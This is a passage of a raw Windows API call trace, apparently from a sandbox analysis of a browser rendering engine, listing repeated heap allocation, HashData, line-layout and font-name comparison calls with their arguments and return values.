cbHash=0x2 | out: pbHash=0x197a18) returned 0x0 [0161.035] HashData (in: pbData=0x197a14, cbData=0x4, pbHash=0x197a20, cbHash=0x2 | out: pbHash=0x197a20) returned 0x0 [0161.035] HashData (in: pbData=0x6d9724, cbData=0xc, pbHash=0x197a1c, cbHash=0x2 | out: pbHash=0x197a1c) returned 0x0 [0161.035] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9720 | out: hHeap=0x5e0000) returned 1 [0161.035] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d9618 [0161.035] HashData (in: pbData=0x6d9618, cbData=0x1, pbHash=0x197a18, cbHash=0x2 | out: pbHash=0x197a18) returned 0x0 [0161.035] HashData (in: pbData=0x197a14, cbData=0x4, pbHash=0x197a20, cbHash=0x2 | out: pbHash=0x197a20) returned 0x0 [0161.035] HashData (in: pbData=0x6d961c, cbData=0xc, pbHash=0x197a1c, cbHash=0x2 | out: pbHash=0x197a1c) returned 0x0 [0161.035] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9618 | out: hHeap=0x5e0000) returned 1 [0161.036] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.036] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d9720 [0161.036] HashData (in: pbData=0x6d9720, cbData=0x1, pbHash=0x197a18, cbHash=0x2 | out: pbHash=0x197a18) returned 0x0 [0161.036] HashData (in: pbData=0x197a14, cbData=0x4, pbHash=0x197a20, cbHash=0x2 | out: pbHash=0x197a20) returned 0x0 [0161.036] HashData (in: pbData=0x6d9724, cbData=0xc, pbHash=0x197a1c, cbHash=0x2 | out: pbHash=0x197a1c) returned 0x0 [0161.036] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9720 | out: hHeap=0x5e0000) returned 1 [0161.036] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d9720 [0161.036] HashData (in: pbData=0x6d9720, cbData=0x1, pbHash=0x197a18, cbHash=0x2 | out: pbHash=0x197a18) returned 0x0 [0161.036] HashData (in: pbData=0x197a14, cbData=0x4, pbHash=0x197a20, cbHash=0x2 | out: pbHash=0x197a20) returned 0x0 [0161.036] HashData (in: pbData=0x6d9724, cbData=0xc, pbHash=0x197a1c, cbHash=0x2 | out: pbHash=0x197a1c) returned 0x0 [0161.036] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9720 | out: hHeap=0x5e0000) returned 1 [0161.036] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.036] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d9720 [0161.037] HashData (in: pbData=0x6d9720, cbData=0x1, pbHash=0x197a18, cbHash=0x2 | out: pbHash=0x197a18) returned 0x0 [0161.037] HashData (in: pbData=0x197a14, cbData=0x4, pbHash=0x197a20, cbHash=0x2 | out: pbHash=0x197a20) returned 0x0 [0161.037] HashData (in: pbData=0x6d9724, cbData=0xc, pbHash=0x197a1c, cbHash=0x2 | out: pbHash=0x197a1c) returned 0x0 [0161.037] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9720 | out: hHeap=0x5e0000) returned 1 [0161.037] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d9720 [0161.037] HashData (in: pbData=0x6d9720, cbData=0x1, pbHash=0x197a18, cbHash=0x2 | out: pbHash=0x197a18) returned 0x0 [0161.037] HashData (in: pbData=0x197a14, cbData=0x4, pbHash=0x197a20, cbHash=0x2 | out: pbHash=0x197a20) returned 0x0 [0161.037] HashData (in: pbData=0x6d9724, cbData=0xc, pbHash=0x197a1c, cbHash=0x2 | out: pbHash=0x197a1c) returned 0x0 [0161.037] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9720 | out: hHeap=0x5e0000) returned 1 [0161.037] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.037] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d9588 [0161.037] HashData (in: pbData=0x6d9588, cbData=0x1, pbHash=0x197a18, cbHash=0x2 | out: pbHash=0x197a18) returned 0x0 [0161.037] HashData (in: pbData=0x197a14, cbData=0x4, pbHash=0x197a20, cbHash=0x2 | out: pbHash=0x197a20) returned 0x0 [0161.037] HashData (in: pbData=0x6d958c, cbData=0xc, pbHash=0x197a1c, cbHash=0x2 | out: pbHash=0x197a1c) returned 0x0 [0161.037] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9588 | out: hHeap=0x5e0000) returned 1 [0161.037] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d9720 [0161.037] HashData (in: pbData=0x6d9720, cbData=0x1, pbHash=0x197a18, cbHash=0x2 | out: pbHash=0x197a18) returned 0x0 [0161.037] HashData (in: pbData=0x197a14, cbData=0x4, pbHash=0x197a20, cbHash=0x2 | out: pbHash=0x197a20) returned 0x0 [0161.037] HashData (in: pbData=0x6d9724, cbData=0xc, pbHash=0x197a1c, cbHash=0x2 | out: pbHash=0x197a1c) returned 0x0 [0161.037] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9720 | out: hHeap=0x5e0000) returned 1 [0161.038] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.038] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d9720 [0161.038] HashData (in: pbData=0x6d9720, cbData=0x1, pbHash=0x197a18, cbHash=0x2 | out: pbHash=0x197a18) returned 0x0 [0161.038] HashData (in: pbData=0x197a14, cbData=0x4, pbHash=0x197a20, cbHash=0x2 | out: pbHash=0x197a20) returned 0x0 [0161.038] HashData (in: pbData=0x6d9724, cbData=0xc, pbHash=0x197a1c, cbHash=0x2 | out: pbHash=0x197a1c) returned 0x0 [0161.038] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9720 | out: hHeap=0x5e0000) returned 1 [0161.038] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d9720 [0161.038] HashData (in: pbData=0x6d9720, cbData=0x1, pbHash=0x197a18, cbHash=0x2 | out: pbHash=0x197a18) returned 0x0 [0161.038] HashData (in: pbData=0x197a14, cbData=0x4, pbHash=0x197a20, cbHash=0x2 | out: pbHash=0x197a20) returned 0x0 [0161.038] HashData (in: pbData=0x6d9724, cbData=0xc, pbHash=0x197a1c, cbHash=0x2 | out: pbHash=0x197a1c) returned 0x0 [0161.038] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9720 | out: hHeap=0x5e0000) returned 1 [0161.038] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.038] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d9570 [0161.038] HashData (in: pbData=0x6d9570, cbData=0x1, pbHash=0x197a18, cbHash=0x2 | out: pbHash=0x197a18) returned 0x0 [0161.038] HashData (in: pbData=0x197a14, cbData=0x4, pbHash=0x197a20, cbHash=0x2 | out: pbHash=0x197a20) returned 0x0 [0161.038] HashData (in: pbData=0x6d9574, cbData=0xc, pbHash=0x197a1c, cbHash=0x2 | out: pbHash=0x197a1c) returned 0x0 [0161.039] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9570 | out: hHeap=0x5e0000) returned 1 [0161.039] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d95d0 [0161.039] HashData (in: pbData=0x6d95d0, cbData=0x1, pbHash=0x197a18, cbHash=0x2 | out: pbHash=0x197a18) returned 0x0 [0161.039] HashData (in: pbData=0x197a14, cbData=0x4, pbHash=0x197a20, cbHash=0x2 | out: pbHash=0x197a20) returned 0x0 [0161.039] HashData (in: pbData=0x6d95d4, cbData=0xc, pbHash=0x197a1c, cbHash=0x2 | out: pbHash=0x197a1c) returned 0x0 [0161.039] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d95d0 | out: hHeap=0x5e0000) returned 1 [0161.039] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.039] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.039] LsSetDoc () returned 0x0 [0161.039] LsCreateLine () returned 0x0 [0161.039] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.039] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d9720 [0161.040] HashData (in: pbData=0x6d9720, cbData=0x1, pbHash=0x1969a8, cbHash=0x2 | out: pbHash=0x1969a8) returned 0x0 [0161.040] HashData (in: pbData=0x1969a4, cbData=0x4, pbHash=0x1969b0, cbHash=0x2 | out: pbHash=0x1969b0) returned 0x0 [0161.040] HashData (in: pbData=0x6d9724, cbData=0xc, pbHash=0x1969ac, cbHash=0x2 | out: pbHash=0x1969ac) returned 0x0 [0161.040] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9720 | out: hHeap=0x5e0000) returned 1 [0161.040] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d9720 [0161.040] HashData (in: pbData=0x6d9720, cbData=0x1, pbHash=0x1969a8, cbHash=0x2 | out: pbHash=0x1969a8) returned 0x0 [0161.040] HashData (in: pbData=0x1969a4, cbData=0x4, pbHash=0x1969b0, cbHash=0x2 | out: pbHash=0x1969b0) returned 0x0 [0161.040] HashData (in: pbData=0x6d9724, cbData=0xc, pbHash=0x1969ac, cbHash=0x2 | out: pbHash=0x1969ac) returned 0x0 [0161.040] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9720 | out: hHeap=0x5e0000) returned 1 [0161.040] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.040] LsdnFinishRegular () returned 0x0 [0161.040] LsQueryLineDup () returned 0x0 [0161.040] IOleInPlaceFrame:SetMenu (This=0xd0f320, hmenuShared=0x814c, holemenu=0x0, hwndActiveObject=0x1) returned 0x0 [0161.040] LsQueryLineCpPpoint () returned 0x0 [0161.040] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.041] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.041] LsDestroyLine () returned 0x0 [0161.041] IOleInPlaceSite:CanInPlaceActivate (This=0xcfaee0) returned 0x0 [0161.041] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.041] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d9720 [0161.041] HashData (in: pbData=0x6d9720, cbData=0x1, pbHash=0x197a18, cbHash=0x2 | out: pbHash=0x197a18) returned 0x0 [0161.041] HashData (in: pbData=0x197a14, cbData=0x4, pbHash=0x197a20, cbHash=0x2 | out: pbHash=0x197a20) returned 0x0 [0161.041] HashData (in: pbData=0x6d9724, cbData=0xc, pbHash=0x197a1c, cbHash=0x2 | out: pbHash=0x197a1c) returned 0x0 [0161.041] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9720 | out: hHeap=0x5e0000) returned 1 [0161.041] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d9720 [0161.041] HashData (in: pbData=0x6d9720, cbData=0x1, pbHash=0x197a18, cbHash=0x2 | out: pbHash=0x197a18) returned 0x0 [0161.041] HashData (in: pbData=0x197a14, cbData=0x4, pbHash=0x197a20, cbHash=0x2 | out: pbHash=0x197a20) returned 0x0 [0161.041] HashData (in: pbData=0x6d9724, cbData=0xc, pbHash=0x197a1c, cbHash=0x2 | out: pbHash=0x197a1c) returned 0x0 [0161.042] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9720 | out: hHeap=0x5e0000) returned 1 [0161.042] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.042] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d9720 [0161.042] HashData (in: pbData=0x6d9720, cbData=0x1, pbHash=0x197a18, cbHash=0x2 | out: pbHash=0x197a18) returned 0x0 [0161.042] HashData (in: pbData=0x197a14, cbData=0x4, pbHash=0x197a20, cbHash=0x2 | out: pbHash=0x197a20) returned 0x0 [0161.042] HashData (in: pbData=0x6d9724, cbData=0xc, pbHash=0x197a1c, cbHash=0x2 | out: pbHash=0x197a1c) returned 0x0 [0161.042] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9720 | out: hHeap=0x5e0000) returned 1 [0161.042] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d9588 [0161.042] HashData (in: pbData=0x6d9588, cbData=0x1, pbHash=0x197a18, cbHash=0x2 | out: pbHash=0x197a18) returned 0x0 [0161.042] HashData (in: pbData=0x197a14, cbData=0x4, pbHash=0x197a20, cbHash=0x2 | out: pbHash=0x197a20) returned 0x0 [0161.042] HashData (in: pbData=0x6d958c, cbData=0xc, pbHash=0x197a1c, cbHash=0x2 | out: pbHash=0x197a1c) returned 0x0 [0161.042] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9588 | out: hHeap=0x5e0000) returned 1 [0161.042] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.042] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d95b8 [0161.043] HashData (in: pbData=0x6d95b8, cbData=0x1, pbHash=0x197a18, cbHash=0x2 | out: pbHash=0x197a18) returned 0x0 [0161.043] HashData (in: pbData=0x197a14, cbData=0x4, pbHash=0x197a20, cbHash=0x2 | out: pbHash=0x197a20) returned 0x0 [0161.043] HashData (in: pbData=0x6d95bc, cbData=0xc, pbHash=0x197a1c, cbHash=0x2 | out: pbHash=0x197a1c) returned 0x0 [0161.043] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d95b8 | out: hHeap=0x5e0000) returned 1 [0161.043] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d9618 [0161.043] HashData (in: pbData=0x6d9618, cbData=0x1, pbHash=0x197a18, cbHash=0x2 | out: pbHash=0x197a18) returned 0x0 [0161.043] HashData (in: pbData=0x197a14, cbData=0x4, pbHash=0x197a20, cbHash=0x2 | out: pbHash=0x197a20) returned 0x0 [0161.043] HashData (in: pbData=0x6d961c, cbData=0xc, pbHash=0x197a1c, cbHash=0x2 | out: pbHash=0x197a1c) returned 0x0 [0161.043] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9618 | out: hHeap=0x5e0000) returned 1 [0161.043] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.043] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d9720 [0161.044] HashData (in: pbData=0x6d9720, cbData=0x1, pbHash=0x197a18, cbHash=0x2 | out: pbHash=0x197a18) returned 0x0 [0161.044] HashData (in: pbData=0x197a14, cbData=0x4, pbHash=0x197a20, cbHash=0x2 | out: pbHash=0x197a20) returned 0x0 [0161.044] HashData (in: pbData=0x6d9724, cbData=0xc, pbHash=0x197a1c, cbHash=0x2 | out: pbHash=0x197a1c) returned 0x0 [0161.044] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9720 | out: hHeap=0x5e0000) returned 1 [0161.044] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d9720 [0161.044] HashData (in: pbData=0x6d9720, cbData=0x1, pbHash=0x197a18, cbHash=0x2 | out: pbHash=0x197a18) returned 0x0 [0161.044] HashData (in: pbData=0x197a14, cbData=0x4, pbHash=0x197a20, cbHash=0x2 | out: pbHash=0x197a20) returned 0x0 [0161.044] HashData (in: pbData=0x6d9724, cbData=0xc, pbHash=0x197a1c, cbHash=0x2 | out: pbHash=0x197a1c) returned 0x0 [0161.044] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9720 | out: hHeap=0x5e0000) returned 1 [0161.044] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.044] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.045] LsSetDoc () returned 0x0 [0161.045] LsCreateLine () returned 0x0 [0161.045] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.046] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d9720 [0161.046] HashData (in: pbData=0x6d9720, cbData=0x1, pbHash=0x1969a8, cbHash=0x2 | out: pbHash=0x1969a8) returned 0x0 [0161.046] HashData (in: pbData=0x1969a4, cbData=0x4, pbHash=0x1969b0, cbHash=0x2 | out: pbHash=0x1969b0) returned 0x0 [0161.046] HashData (in: pbData=0x6d9724, cbData=0xc, pbHash=0x1969ac, cbHash=0x2 | out: pbHash=0x1969ac) returned 0x0 [0161.046] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9720 | out: hHeap=0x5e0000) returned 1 [0161.046] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d95b8 [0161.046] HashData (in: pbData=0x6d95b8, cbData=0x1, pbHash=0x1969a8, cbHash=0x2 | out: pbHash=0x1969a8) returned 0x0 [0161.046] HashData (in: pbData=0x1969a4, cbData=0x4, pbHash=0x1969b0, cbHash=0x2 | out: pbHash=0x1969b0) returned 0x0 [0161.046] HashData (in: pbData=0x6d95bc, cbData=0xc, pbHash=0x1969ac, cbHash=0x2 | out: pbHash=0x1969ac) returned 0x0 [0161.046] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d95b8 | out: hHeap=0x5e0000) returned 1 [0161.047] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.047] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.047] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.047] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.048] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.048] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.048] LsSetDoc () returned 0x0 [0161.048] LsCreateLine () returned 0x0 [0161.048] LsQueryLineDup () returned 0x0 [0161.048] LsDestroyLine () returned 0x0 [0161.048] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.048] LsdnFinishRegular () returned 0x0 [0161.049] LsQueryLineDup () returned 0x0 [0161.049] IOleInPlaceFrame:SetMenu (This=0xd0f340, hmenuShared=0x74cc, holemenu=0x0, hwndActiveObject=0x1) returned 0x0 [0161.049] LsQueryLineCpPpoint () returned 0x0 [0161.049] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.049] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.050] LsDestroyLine () returned 0x0 [0161.050] IOleInPlaceSite:CanInPlaceActivate (This=0xcfaee0) returned 0x0 [0161.050] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.050] LsdnFinishRegular () returned 0x0 [0161.050] LsQueryLineDup () returned 0x0 [0161.050] IOleInPlaceFrame:SetMenu (This=0xd0f2c0, hmenuShared=0x94d4, holemenu=0x0, hwndActiveObject=0x1) returned 0x0 [0161.051] LsQueryLineCpPpoint () returned 0x0 [0161.051] LsDestroyLine () returned 0x0 [0161.051] IOleInPlaceSite:CanInPlaceActivate (This=0xcfa380) returned 0x0 [0161.051] memcpy_s (in: _Destination=0x198550, _DestinationSize=0xc28, _Source=0x6e8993e0, _SourceSize=0xc28 | out: _Destination=0x198550) returned 0x0 [0161.051] StrCmpICW (pszStr1="ms sans serif", pszStr2="sans-serif") returned -6 [0161.051] StrCmpICW (pszStr1="ms sans serif", pszStr2="serif") returned -6 [0161.051] StrCmpICW (pszStr1="ms sans serif", pszStr2="monospace") returned 4 [0161.051] StrCmpICW (pszStr1="ms sans serif", pszStr2="cursive") returned 10 [0161.051] StrCmpICW (pszStr1="ms sans serif", pszStr2="fantasy") returned 7 [0161.051] StrCmpICW (pszStr1="ms sans serif", pszStr2="inherit") returned 4 [0161.051] StrCmpICW (pszStr1="ms sans serif", pszStr2="initial") returned 4 [0161.051] StrCmpICW (pszStr1="ms sans serif", pszStr2="default") returned 9 [0161.051] MulDiv (nNumber=8000, nNumerator=20, nDenominator=1000) returned 160 [0161.051] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.052] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x6) returned 0x9ee6d60 [0161.052] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.052] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.052] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d9720 [0161.052] HashData (in: pbData=0x6d9720, cbData=0x1, pbHash=0x198090, cbHash=0x2 | out: pbHash=0x198090) returned 0x0 [0161.052] HashData (in: pbData=0x19808c, cbData=0x4, pbHash=0x198098, cbHash=0x2 | out: pbHash=0x198098) returned 0x0 [0161.052] HashData (in: pbData=0x6d9724, cbData=0xc, pbHash=0x198094, cbHash=0x2 | out: pbHash=0x198094) returned 0x0 [0161.052] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9720 | out: hHeap=0x5e0000) returned 1 [0161.052] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d9720 [0161.052] HashData (in: pbData=0x6d9720, cbData=0x1, pbHash=0x198090, cbHash=0x2 | out: pbHash=0x198090) returned 0x0 [0161.052] HashData (in: pbData=0x19808c, cbData=0x4, pbHash=0x198098, cbHash=0x2 | out: pbHash=0x198098) returned 0x0 [0161.052] HashData (in: pbData=0x6d9724, cbData=0xc, pbHash=0x198094, cbHash=0x2 | out: pbHash=0x198094) returned 0x0 [0161.052] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9720 | out: hHeap=0x5e0000) returned 1 [0161.052] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.053] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.053] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.053] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6d60 | out: hHeap=0x5e0000) returned 1 [0161.053] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.053] LsSetDoc () returned 0x0 [0161.053] LsCreateLine () returned 0x0 [0161.053] LsQueryLineDup () returned 0x0 [0161.053] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.054] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d9618 [0161.054] HashData (in: pbData=0x6d9618, cbData=0x1, pbHash=0x198708, cbHash=0x2 | out: pbHash=0x198708) returned 0x0 [0161.054] HashData (in: pbData=0x198704, cbData=0x4, pbHash=0x198710, cbHash=0x2 | out: pbHash=0x198710) returned 0x0 [0161.054] HashData (in: pbData=0x6d961c, cbData=0xc, pbHash=0x19870c, cbHash=0x2 | out: pbHash=0x19870c) returned 0x0 [0161.054] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9618 | out: hHeap=0x5e0000) returned 1 [0161.054] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d95b8 [0161.054] HashData (in: pbData=0x6d95b8, cbData=0x1, pbHash=0x198708, cbHash=0x2 | out: pbHash=0x198708) returned 0x0 [0161.054] HashData (in: pbData=0x198704, cbData=0x4, pbHash=0x198710, cbHash=0x2 | out: pbHash=0x198710) returned 0x0 [0161.054] HashData (in: pbData=0x6d95bc, cbData=0xc, pbHash=0x19870c, cbHash=0x2 | out: pbHash=0x19870c) returned 0x0 [0161.054] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d95b8 | out: hHeap=0x5e0000) returned 1 [0161.054] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.055] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.055] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.055] LsSetDoc () returned 0x0 [0161.055] LsCreateLine () returned 0x0 [0161.055] LsQueryLineDup () returned 0x0 [0161.055] LsDestroyLine () returned 0x0 [0161.055] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.056] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d9720 [0161.056] HashData (in: pbData=0x6d9720, cbData=0x1, pbHash=0x198708, cbHash=0x2 | out: pbHash=0x198708) returned 0x0 [0161.056] HashData (in: pbData=0x198704, cbData=0x4, pbHash=0x198710, cbHash=0x2 | out: pbHash=0x198710) returned 0x0 [0161.056] HashData (in: pbData=0x6d9724, cbData=0xc, pbHash=0x19870c, cbHash=0x2 | out: pbHash=0x19870c) returned 0x0 [0161.056] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9720 | out: hHeap=0x5e0000) returned 1 [0161.056] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d9570 [0161.056] HashData (in: pbData=0x6d9570, cbData=0x1, pbHash=0x198708, cbHash=0x2 | out: pbHash=0x198708) returned 0x0 [0161.056] HashData (in: pbData=0x198704, cbData=0x4, pbHash=0x198710, cbHash=0x2 | out: pbHash=0x198710) returned 0x0 [0161.056] HashData (in: pbData=0x6d9574, cbData=0xc, pbHash=0x19870c, cbHash=0x2 | out: pbHash=0x19870c) returned 0x0 [0161.056] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9570 | out: hHeap=0x5e0000) returned 1 [0161.056] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.056] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.057] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.057] LsSetDoc () returned 0x0 [0161.057] LsCreateLine () returned 0x0 [0161.057] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.095] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6d00 [0161.096] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d95b8 [0161.096] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d7af8 [0161.096] HashData (in: pbData=0x6d95bc, cbData=0x4, pbHash=0x6d95c0, cbHash=0x2 | out: pbHash=0x6d95c0) returned 0x0 [0161.096] HashData (in: pbData=0x6d7af8, cbData=0x2, pbHash=0x1975e8, cbHash=0x2 | out: pbHash=0x1975e8) returned 0x0 [0161.096] HashData (in: pbData=0x6d7afa, cbData=0x2, pbHash=0x1975e8, cbHash=0x2 | out: pbHash=0x1975e8) returned 0x0 [0161.096] HashData (in: pbData=0x6d7afc, cbData=0x8, pbHash=0x1975fc, cbHash=0x2 | out: pbHash=0x1975fc) returned 0x0 [0161.096] HashData (in: pbData=0x6d7b04, cbData=0x8, pbHash=0x1975e8, cbHash=0x2 | out: pbHash=0x1975e8) returned 0x0 [0161.096] HashData (in: pbData=0x6d7b0c, cbData=0x8, pbHash=0x1975e8, cbHash=0x2 | out: pbHash=0x1975e8) returned 0x0 [0161.096] HashData (in: pbData=0x6d7b14, cbData=0x2, pbHash=0x1975e8, cbHash=0x2 | out: pbHash=0x1975e8) returned 0x0 [0161.096] HashData (in: pbData=0x6d7b16, cbData=0x2, pbHash=0x1975e8, cbHash=0x2 | out: pbHash=0x1975e8) returned 0x0 [0161.096] HashData (in: pbData=0x6d7b18, cbData=0x8, pbHash=0x1975e8, cbHash=0x2 | out: pbHash=0x1975e8) returned 0x0 [0161.096] HashData (in: pbData=0x6d7b20, cbData=0x8, pbHash=0x1975e8, cbHash=0x2 | out: pbHash=0x1975e8) returned 0x0 [0161.096] HashData (in: pbData=0x197614, cbData=0x4, pbHash=0x197600, cbHash=0x2 | out: pbHash=0x197600) returned 0x0 [0161.096] HashData (in: pbData=0x6d7b2c, cbData=0x8, pbHash=0x1975fc, cbHash=0x2 | out: pbHash=0x1975fc) returned 0x0 [0161.096] HashData (in: pbData=0x6d7b34, cbData=0x8, pbHash=0x1975e8, cbHash=0x2 | out: pbHash=0x1975e8) returned 0x0 [0161.096] HashData (in: pbData=0x6d7b40, cbData=0x4, pbHash=0x1975fc, cbHash=0x2 | out: pbHash=0x1975fc) returned 0x0 [0161.096] HashData (in: pbData=0x6d7b44, cbData=0x8, pbHash=0x1975fc, cbHash=0x2 | out: pbHash=0x1975fc) returned 0x0 [0161.096] HashData (in: pbData=0x6d7b4c, cbData=0x8, pbHash=0x1975e8, cbHash=0x2 | out: pbHash=0x1975e8) returned 0x0 [0161.096] HashData (in: pbData=0x6d7b58, cbData=0x4, pbHash=0x1975fc, cbHash=0x2 | out: pbHash=0x1975fc) returned 0x0 [0161.097] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7af8 | out: hHeap=0x5e0000) returned 1 